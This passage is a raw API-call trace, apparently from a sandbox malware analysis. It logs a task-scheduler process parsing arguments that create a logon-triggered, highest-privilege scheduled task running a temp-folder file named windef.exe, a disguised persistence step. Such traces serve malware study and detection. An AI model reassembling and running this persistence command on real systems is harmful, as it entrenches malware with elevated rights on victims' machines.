lstrlenW (lpString="|sc|") returned 4 [0176.471] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0176.471] RtlRestoreLastWin32Error () returned 0x490 [0176.471] lstrlenW (lpString="query") returned 5 [0176.471] lstrlenW (lpString="query") returned 5 [0176.471] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.471] lstrlenW (lpString="sc") returned 2 [0176.471] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.471] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0176.472] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0176.472] lstrlenW (lpString="|query|") returned 7 [0176.472] lstrlenW (lpString="|sc|") returned 4 [0176.472] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0176.472] RtlRestoreLastWin32Error () returned 0x490 [0176.472] lstrlenW (lpString="change") returned 6 [0176.472] lstrlenW (lpString="change") returned 6 [0176.472] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.472] lstrlenW (lpString="sc") returned 2 [0176.472] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.472] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0176.472] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0176.472] lstrlenW (lpString="|change|") returned 8 [0176.472] lstrlenW (lpString="|sc|") returned 4 [0176.472] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0176.472] RtlRestoreLastWin32Error () returned 0x490 [0176.472] lstrlenW (lpString="run") returned 3 [0176.472] lstrlenW (lpString="run") returned 3 [0176.473] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.473] lstrlenW (lpString="sc") returned 2 [0176.473] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.473] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0176.473] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0176.473] lstrlenW (lpString="|run|") returned 5 [0176.473] lstrlenW (lpString="|sc|") returned 4 [0176.473] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0176.473] RtlRestoreLastWin32Error () returned 0x490 [0176.473] lstrlenW (lpString="end") returned 3 [0176.473] lstrlenW (lpString="end") returned 3 [0176.473] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.473] lstrlenW (lpString="sc") returned 2 [0176.474] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.474] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0176.474] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0176.474] lstrlenW (lpString="|end|") returned 5 [0176.474] lstrlenW (lpString="|sc|") returned 4 [0176.474] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0176.474] RtlRestoreLastWin32Error () returned 0x490 [0176.474] lstrlenW (lpString="showsid") returned 7 [0176.474] lstrlenW (lpString="showsid") returned 7 [0176.474] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.475] lstrlenW (lpString="sc") returned 2 [0176.475] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.475] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0176.475] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0176.475] lstrlenW (lpString="|showsid|") returned 9 [0176.475] lstrlenW (lpString="|sc|") returned 4 [0176.475] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0176.475] RtlRestoreLastWin32Error () returned 0x490 [0176.475] RtlRestoreLastWin32Error () returned 0x490 [0176.475] RtlRestoreLastWin32Error () returned 0x0 [0176.475] lstrlenW (lpString="/sc") returned 3 [0176.475] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0176.475] RtlRestoreLastWin32Error () returned 0x490 [0176.475] RtlRestoreLastWin32Error () returned 0x0 [0176.475] lstrlenW (lpString="/sc") returned 3 [0176.475] GetProcessHeap () returned 0x47c0000 [0176.475] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x8) returned 0x47c27d8 [0176.475] GetProcessHeap () returned 0x47c0000 [0176.475] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9598 [0176.475] RtlRestoreLastWin32Error () returned 0x0 [0176.475] RtlRestoreLastWin32Error () returned 0x0 [0176.475] lstrlenW (lpString="ONLOGON") returned 7 [0176.475] lstrlenW (lpString="-/") returned 2 [0176.475] StrChrIW (lpStart="-/", wMatch=0x30004f) returned 0x0 [0176.476] RtlRestoreLastWin32Error () returned 0x490 [0176.476] RtlRestoreLastWin32Error () returned 0x490 [0176.476] RtlRestoreLastWin32Error () returned 0x0 [0176.476] lstrlenW (lpString="ONLOGON") returned 7 [0176.476] StrChrIW (lpStart="ONLOGON", wMatch=0x3a) returned 0x0 [0176.476] RtlRestoreLastWin32Error () returned 0x490 [0176.476] RtlRestoreLastWin32Error () returned 0x0 [0176.476] lstrlenW (lpString="ONLOGON") returned 7 [0176.476] GetProcessHeap () returned 0x47c0000 [0176.476] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7658 [0176.476] GetProcessHeap () returned 0x47c0000 [0176.476] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9498 [0176.476] RtlRestoreLastWin32Error () returned 0x0 [0176.476] RtlRestoreLastWin32Error () returned 0x0 [0176.476] lstrlenW (lpString="/tr") returned 3 [0176.476] lstrlenW (lpString="-/") returned 2 [0176.476] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.477] lstrlenW (lpString="?") returned 1 [0176.477] lstrlenW (lpString="?") returned 1 [0176.477] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.477] lstrlenW (lpString="tr") returned 2 [0176.477] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.477] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0176.477] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0176.477] lstrlenW (lpString="|?|") returned 3 [0176.477] lstrlenW (lpString="|tr|") returned 4 [0176.477] RtlRestoreLastWin32Error () returned 0x490 [0176.477] lstrlenW (lpString="create") returned 6 [0176.477] lstrlenW (lpString="create") returned 6 [0176.477] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.477] lstrlenW (lpString="tr") returned 2 [0176.477] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.477] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0176.477] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0176.478] lstrlenW (lpString="|create|") returned 8 [0176.478] lstrlenW (lpString="|tr|") returned 4 [0176.478] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0176.478] RtlRestoreLastWin32Error () returned 0x490 [0176.478] lstrlenW (lpString="delete") returned 6 [0176.478] lstrlenW (lpString="delete") returned 6 [0176.478] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.478] lstrlenW (lpString="tr") returned 2 [0176.478] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.478] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0176.478] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0176.478] lstrlenW (lpString="|delete|") returned 8 [0176.478] lstrlenW (lpString="|tr|") returned 4 [0176.478] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0176.478] RtlRestoreLastWin32Error () returned 0x490 [0176.478] lstrlenW (lpString="query") returned 5 [0176.479] lstrlenW (lpString="query") returned 5 [0176.479] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.479] lstrlenW (lpString="tr") returned 2 [0176.479] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.479] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0176.479] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0176.479] lstrlenW (lpString="|query|") returned 7 [0176.479] lstrlenW (lpString="|tr|") returned 4 [0176.479] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0176.479] RtlRestoreLastWin32Error () returned 0x490 [0176.479] lstrlenW (lpString="change") returned 6 [0176.479] lstrlenW (lpString="change") returned 6 [0176.479] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.480] lstrlenW (lpString="tr") returned 2 [0176.480] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.480] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0176.480] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0176.480] lstrlenW (lpString="|change|") returned 8 [0176.480] lstrlenW (lpString="|tr|") returned 4 [0176.480] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0176.480] RtlRestoreLastWin32Error () returned 0x490 [0176.480] lstrlenW (lpString="run") returned 3 [0176.480] lstrlenW (lpString="run") returned 3 [0176.480] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.481] lstrlenW (lpString="tr") returned 2 [0176.481] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.481] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0176.481] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0176.481] lstrlenW (lpString="|run|") returned 5 [0176.481] lstrlenW (lpString="|tr|") returned 4 [0176.481] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0176.481] RtlRestoreLastWin32Error () returned 0x490 [0176.482] lstrlenW (lpString="end") returned 3 [0176.482] lstrlenW (lpString="end") returned 3 [0176.482] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.482] lstrlenW (lpString="tr") returned 2 [0176.482] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.482] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0176.482] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0176.482] lstrlenW (lpString="|end|") returned 5 [0176.482] lstrlenW (lpString="|tr|") returned 4 [0176.483] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0176.483] RtlRestoreLastWin32Error () returned 0x490 [0176.483] lstrlenW (lpString="showsid") returned 7 [0176.483] lstrlenW (lpString="showsid") returned 7 [0176.483] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.483] lstrlenW (lpString="tr") returned 2 [0176.483] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.483] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0176.483] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0176.483] lstrlenW (lpString="|showsid|") returned 9 [0176.484] lstrlenW (lpString="|tr|") returned 4 [0176.484] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0176.484] RtlRestoreLastWin32Error () returned 0x490 [0176.484] RtlRestoreLastWin32Error () returned 0x490 [0176.484] RtlRestoreLastWin32Error () returned 0x0 [0176.484] lstrlenW (lpString="/tr") returned 3 [0176.484] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 0x0 [0176.484] RtlRestoreLastWin32Error () returned 0x490 [0176.484] RtlRestoreLastWin32Error () returned 0x0 [0176.484] lstrlenW (lpString="/tr") returned 3 [0176.484] GetProcessHeap () returned 0x47c0000 [0176.484] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x8) returned 0x47c6628 [0176.484] GetProcessHeap () returned 0x47c0000 [0176.484] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c94d8 [0176.484] RtlRestoreLastWin32Error () returned 0x0 [0176.484] RtlRestoreLastWin32Error () returned 0x0 [0176.485] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.485] lstrlenW (lpString="-/") returned 2 [0176.485] StrChrIW (lpStart="-/", wMatch=0x300043) returned 0x0 [0176.485] RtlRestoreLastWin32Error () returned 0x490 [0176.485] RtlRestoreLastWin32Error () returned 0x490 [0176.485] RtlRestoreLastWin32Error () returned 0x0 [0176.485] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.485] StrChrIW (lpStart="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe", wMatch=0x3a) returned=":\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe" [0176.485] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.485] GetProcessHeap () returned 0x47c0000 [0176.485] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47c7670 [0176.485] _memicmp (_Buf1=0x47c7670, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.485] GetProcessHeap () returned 0x47c0000 [0176.485] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xc) returned 0x47c7688 [0176.486] GetProcessHeap () returned 0x47c0000 [0176.486] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cabb8 [0176.486] _memicmp (_Buf1=0x47cabb8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.486] GetProcessHeap () returned 0x47c0000 [0176.486] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x64) returned 0x47c70c0 [0176.486] RtlRestoreLastWin32Error () returned 0x7a [0176.486] RtlRestoreLastWin32Error () returned 0x0 [0176.486] RtlRestoreLastWin32Error () returned 0x0 [0176.486] lstrlenW (lpString="C") returned 1 [0176.486] RtlRestoreLastWin32Error () returned 0x490 [0176.486] RtlRestoreLastWin32Error () returned 0x0 [0176.486] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.487] GetProcessHeap () returned 0x47c0000 [0176.487] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x60) returned 0x47cad98 [0176.487] GetProcessHeap () returned 0x47c0000 [0176.487] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9618 [0176.487] RtlRestoreLastWin32Error () returned 0x0 [0176.487] RtlRestoreLastWin32Error () returned 0x0 [0176.487] lstrlenW (lpString="/rl") returned 3 [0176.487] lstrlenW (lpString="-/") returned 2 [0176.487] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.487] lstrlenW (lpString="?") returned 1 [0176.487] lstrlenW (lpString="?") returned 1 [0176.632] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.632] lstrlenW (lpString="rl") returned 2 [0176.633] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.633] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0176.633] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0176.633] lstrlenW (lpString="|?|") returned 3 [0176.633] lstrlenW (lpString="|rl|") returned 4 [0176.633] RtlRestoreLastWin32Error () returned 0x490 [0176.633] lstrlenW (lpString="create") returned 6 [0176.633] lstrlenW (lpString="create") returned 6 [0176.633] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.633] lstrlenW (lpString="rl") returned 2 [0176.633] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.633] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0176.633] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0176.633] lstrlenW (lpString="|create|") returned 8 [0176.633] lstrlenW (lpString="|rl|") returned 4 [0176.633] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0176.633] RtlRestoreLastWin32Error () returned 0x490 [0176.634] lstrlenW (lpString="delete") returned 6 [0176.634] lstrlenW (lpString="delete") returned 6 [0176.634] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.634] lstrlenW (lpString="rl") returned 2 [0176.634] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.634] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0176.634] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0176.634] lstrlenW (lpString="|delete|") returned 8 [0176.634] lstrlenW (lpString="|rl|") returned 4 [0176.634] StrStrIW (lpFirst="|delete|", lpSrch="|rl|") returned 0x0 [0176.634] RtlRestoreLastWin32Error () returned 0x490 [0176.634] lstrlenW (lpString="query") returned 5 [0176.634] lstrlenW (lpString="query") returned 5 [0176.634] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.635] lstrlenW (lpString="rl") returned 2 [0176.635] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.635] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0176.635] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0176.635] lstrlenW (lpString="|query|") returned 7 [0176.635] lstrlenW (lpString="|rl|") returned 4 [0176.635] StrStrIW (lpFirst="|query|", lpSrch="|rl|") returned 0x0 [0176.635] RtlRestoreLastWin32Error () returned 0x490 [0176.635] lstrlenW (lpString="change") returned 6 [0176.635] lstrlenW (lpString="change") returned 6 [0176.635] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.635] lstrlenW (lpString="rl") returned 2 [0176.635] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.635] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0176.635] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0176.635] lstrlenW (lpString="|change|") returned 8 [0176.635] lstrlenW (lpString="|rl|") returned 4 [0176.635] StrStrIW (lpFirst="|change|", lpSrch="|rl|") returned 0x0 [0176.636] RtlRestoreLastWin32Error () returned 0x490 [0176.636] lstrlenW (lpString="run") returned 3 [0176.636] lstrlenW (lpString="run") returned 3 [0176.636] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.636] lstrlenW (lpString="rl") returned 2 [0176.636] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.636] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0176.636] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0176.636] lstrlenW (lpString="|run|") returned 5 [0176.636] lstrlenW (lpString="|rl|") returned 4 [0176.636] StrStrIW (lpFirst="|run|", lpSrch="|rl|") returned 0x0 [0176.636] RtlRestoreLastWin32Error () returned 0x490 [0176.637] lstrlenW (lpString="end") returned 3 [0176.637] lstrlenW (lpString="end") returned 3 [0176.637] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.637] lstrlenW (lpString="rl") returned 2 [0176.637] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.637] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0176.637] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0176.637] lstrlenW (lpString="|end|") returned 5 [0176.637] lstrlenW (lpString="|rl|") returned 4 [0176.637] StrStrIW (lpFirst="|end|", lpSrch="|rl|") returned 0x0 [0176.637] RtlRestoreLastWin32Error () returned 0x490 [0176.637] lstrlenW (lpString="showsid") returned 7 [0176.637] lstrlenW (lpString="showsid") returned 7 [0176.637] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.637] lstrlenW (lpString="rl") returned 2 [0176.637] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.638] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0176.638] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|rl|") returned 4 [0176.638] lstrlenW (lpString="|showsid|") returned 9 [0176.638] lstrlenW (lpString="|rl|") returned 4 [0176.638] StrStrIW (lpFirst="|showsid|", lpSrch="|rl|") returned 0x0 [0176.638] RtlRestoreLastWin32Error () returned 0x490 [0176.638] RtlRestoreLastWin32Error () returned 0x490 [0176.638] RtlRestoreLastWin32Error () returned 0x0 [0176.638] lstrlenW (lpString="/rl") returned 3 [0176.638] StrChrIW (lpStart="/rl", wMatch=0x3a) returned 0x0 [0176.638] RtlRestoreLastWin32Error () returned 0x490 [0176.638] RtlRestoreLastWin32Error () returned 0x0 [0176.638] lstrlenW (lpString="/rl") returned 3 [0176.638] GetProcessHeap () returned 0x47c0000 [0176.638] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x8) returned 0x47c6890 [0176.638] GetProcessHeap () returned 0x47c0000 [0176.639] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9698 [0176.639] RtlRestoreLastWin32Error () returned 0x0 [0176.639] RtlRestoreLastWin32Error () returned 0x0 [0176.639] lstrlenW (lpString="HIGHEST") returned 7 [0176.639] lstrlenW (lpString="-/") returned 2 [0176.639] StrChrIW (lpStart="-/", wMatch=0x300048) returned 0x0 [0176.639] RtlRestoreLastWin32Error () returned 0x490 [0176.639] RtlRestoreLastWin32Error () returned 0x490 [0176.639] RtlRestoreLastWin32Error () returned 0x0 [0176.639] lstrlenW (lpString="HIGHEST") returned 7 [0176.639] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0176.639] RtlRestoreLastWin32Error () returned 0x490 [0176.639] RtlRestoreLastWin32Error () returned 0x0 [0176.639] lstrlenW (lpString="HIGHEST") returned 7 [0176.639] GetProcessHeap () returned 0x47c0000 [0176.639] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47ca9d8 [0176.639] GetProcessHeap () returned 0x47c0000 [0176.639] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c96d8 [0176.639] RtlRestoreLastWin32Error () returned 0x0 [0176.639] RtlRestoreLastWin32Error () returned 0x0 [0176.640] lstrlenW (lpString="/f") returned 2 [0176.640] lstrlenW (lpString="-/") returned 2 [0176.640] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.640] lstrlenW (lpString="?") returned 1 [0176.640] lstrlenW (lpString="?") returned 1 [0176.640] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.640] lstrlenW (lpString="f") returned 1 [0176.640] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.640] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0176.640] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0176.640] lstrlenW (lpString="|?|") returned 3 [0176.640] lstrlenW (lpString="|f|") returned 3 [0176.640] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0 [0176.640] RtlRestoreLastWin32Error () returned 0x490 [0176.640] lstrlenW (lpString="create") returned 6 [0176.640] lstrlenW (lpString="create") returned 6 [0176.640] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.640] lstrlenW (lpString="f") returned 1 [0176.641] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.641] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0176.641] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0176.641] lstrlenW (lpString="|create|") returned 8 [0176.641] lstrlenW (lpString="|f|") returned 3 [0176.641] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0 [0176.641] RtlRestoreLastWin32Error () returned 0x490 [0176.641] lstrlenW (lpString="delete") returned 6 [0176.641] lstrlenW (lpString="delete") returned 6 [0176.641] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.641] lstrlenW (lpString="f") returned 1 [0176.641] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.641] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0176.641] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|f|") returned 3 [0176.641] lstrlenW (lpString="|delete|") returned 8 [0176.641] lstrlenW (lpString="|f|") 